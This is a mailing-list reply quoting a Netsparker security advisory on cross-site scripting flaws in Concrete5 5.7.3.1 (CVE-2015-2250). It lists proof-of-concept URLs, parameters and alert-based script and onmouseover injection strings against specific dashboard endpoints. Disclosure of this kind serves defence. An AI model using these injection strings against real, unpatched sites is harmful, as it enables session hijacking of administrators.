[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <CAPKwhwvwZmNDGB16UzRp0mzDzf++rZ9OhmwCyHzDouDLAhzDcg@mail.gmail.com>
Date: Wed, 13 May 2015 23:24:49 -0400
From: Scott Arciszewski <scott@...iszewski.me>
To: Onur Yilmaz <onur@...sparker.com>
Cc: fulldisclosure@...lists.org, cert@...t.org, bugs@...uritytracker.com,
bugtraq@...urityfocus.com, submissions@...ketstormsecurity.org
Subject: Re: [FD] Concrete5 Security Advisory - Multiple XSS Vulnerabilities
- CVE-2015-2250
>
> Advisory Timeline
> --------------------
> 05/03/2015 - First Contact
> 06/05/2015 - Vulnerability fixed
> 11/05/2015 - Advisory released
>
I'm honestly surprised it took their team two months to fix this. I've
previously reported issues via HackerOne and they were on it within a day.
If anyone else is thinking about whitehatting up Concrete5, you might get a
faster response if you go through the HackerOne platform. Also, they're
friendly and won't pull a Daniel Kerr move on you if you tell them their
code is Swiss cheese. Speaking from experience here.
On Wed, May 13, 2015 at 10:29 AM, Onur Yilmaz <onur@...sparker.com> wrote:
> Information
> --------------------
> Advisory by Netsparker.
> Name: Multiple XSS Vulnerabilities in Concrete5
> Affected Software : Concrete5
> Affected Versions: 5.7.3.1 and possibly below
> Vendor Homepage : https://www.concrete5.org
> Vulnerability Type : Cross-site Scripting
> Severity : Important
> CVE-ID: CVE-2015-2250
> Netsparker Advisory Reference : NS-15-008
>
> Description
> --------------------
> By exploiting a Cross-site scripting vulnerability the attacker can
> hijack a logged in user’s session. This means that the malicious
> hacker can change the logged in user’s password and invalidate the
> session of the victim while the hacker maintains access. As seen from
> the XSS example in this article, if a web application is vulnerable to
> cross-site scripting and the administrator’s session is hijacked, the
> malicious hacker exploiting the vulnerability will have full admin
> privileges on that web application.
>
> Technical Details
> --------------------
> Proof of Concept URLs for cross-site scripting vulnerabilities in
> Concrete5:
>
> URL:
> /concrete5.7.3.1/index.php/dashboard/system/conversations/bannedwords/success
> Parameter Name: banned_word%5b%5d
> Parameter Type: POST
> Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000936)</scRipt>
>
> URL:
> /concrete5.7.3.1/index.php/dashboard/reports/logs/view?keywords=&level=&channel='"--></style></scRipt><scRipt>alert(0x0044C4)</scRipt>&level[]=600
> Parameter Name: channel
> Parameter Type: GET
> Attack Pattern: '"--></style></scRipt><scRipt>alert(0x0044C4)</scRipt>
>
> URL:
> /concrete5.7.3.1/index.php/tools/required/permissions/access_entity?peID=1&pdID=3&accessType='"--></style></scRipt><scRipt>alert(0x00690C)</scRipt>
> Parameter Name: accessType
> Parameter Type: GET
> Attack Pattern: '"--></style></scRipt><scRipt>alert(0x00690C)</scRipt>
>
> URL:
> /concrete5.7.3.1/index.php/dashboard/system/multilingual/setup/load_icon
> Parameter Name: msCountry
> Parameter Type: POST
> Attack Pattern: '"--></style></scRipt><scRipt>alert(0x00D064)</scRipt>
>
> URL:
> /concrete5.7.3.1/index.php/tools/required/permissions/access_entity?accessType='"--></style></scRipt><scRipt>alert(0x00687C)</scRipt>&pkCategoryHandle=block_type
> Parameter Name: accessType
> Parameter Type: GET
> Attack Pattern: '"--></style></scRipt><scRipt>alert(0x00687C)</scRipt>
>
> URL:
> /concrete5.7.3.1/index.php/ccm/system/dialogs/area/design/submit?ccm_token=1423928022:7f9b7c3cb0f6721bab4a0dec86cefaa3&cID=1&arHandle='"--></style></scRipt><scRipt>alert(0x00D33A)</scRipt>
> Parameter Name: arHandle
> Parameter Type: GET
> Attack Pattern: '"--></style></scRipt><scRipt>alert(0x00D33A)</scRipt>
>
> URL: /concrete5.7.3.1/index.php/dashboard/pages/single
> Parameter Name: pageURL:
> Parameter Type: POST
> Attack Pattern: '"--></style></scRipt><scRipt>alert(0x00627A)</scRipt>
>
> URL:
> /concrete5.7.3.1/index.php/ccm/system/dialogs/area/design?arHandle='"--></style></scRipt><scRipt>alert(0x001D34)</scRipt>&cID=1
> Parameter Name: arHandle
> Parameter Type: GET
> Attack Pattern: '"--></style></scRipt><scRipt>alert(0x001D34)</scRipt>
>
> URL: /concrete5.7.3.1/index.php/dashboard/system/seo/searchindex/updated
> Parameter Name: SEARCH_INDEX_AREA_METHOD
> Parameter Type: POST
> Attack Pattern: '" onmouseover= alert(0x00047E)
>
> URL:
> /concrete5.7.3.1/index.php/dashboard/system/optimization/jobs/job_scheduled
> Parameter Name: unit
> Parameter Type: POST
> Attack Pattern: '" onmouseover= alert(0x000C5A)
>
> URL: /concrete5.7.3.1/index.php/dashboard/system/registration/open/1
> Parameter Name: register_notification_email
> Parameter Type: POST
> Attack Pattern: '" onmouseover= alert(0x0000DE)
>
> URL:
> /concrete5.7.3.1/index.php/dashboard/extend/connect/"onmouseover="alert(0x00170E)
> Parameter Name: URI-BASED
> Parameter Type: Full URL:
> Attack Pattern: /"onmouseover="alert(0x00170E)
>
> For more information on cross-site scripting vulnerabilities read the
> following article:
>
> https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/crosssite-scripting-xss/
>
> Advisory Timeline
> --------------------
> 05/03/2015 - First Contact
> 06/05/2015 - Vulnerability fixed
> 11/05/2015 - Advisory released
>
> Solution
> --------------------
> Download Concrete5 version 5.7.4 which includes fix for this vulnerability.
>
> Credits & Authors
> --------------------
> These issues have been discovered by Omar Kurt while testing
> Netsparker Web Application Security Scanner -
> https://www.netsparker.com/web-vulnerability-scanner/
>
> About Netsparker
> --------------------
> Netsparker finds and reports security issues and vulnerabilities such
> as SQL Injection and Cross-site Scripting (XSS) in all websites and
> web applications regardless of the platform and the technology they
> are built on. Netsparker's unique detection and exploitation
> techniques allows it to be dead accurate in reporting hence it's the
> first and the only False Positive Free web application security
> scanner. For more information visit our website on
> https://www.netsparker.com
>
> --
> Onur Yılmaz - Turkey Manager
>
> Netsparker Web Application Security Scanner
> T: +90 (0)554 873 0482
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists